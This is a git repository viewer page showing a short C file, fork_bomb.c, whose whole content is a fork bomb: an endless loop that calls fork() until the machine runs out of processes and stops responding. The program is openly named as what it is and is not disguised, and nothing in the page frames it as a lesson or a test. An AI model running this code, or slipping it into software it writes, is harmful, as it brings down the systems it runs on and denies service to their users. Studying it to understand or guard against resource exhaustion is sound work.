summaryrefslogtreecommitdiff
path: root/fork_bomb.c
blob: b6583e36e2dcee85b659496622359ecc56fd16e6 (plain)
1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <unistd.h>


int main(void)
{
	while(1)
	fork();
	return 0;
}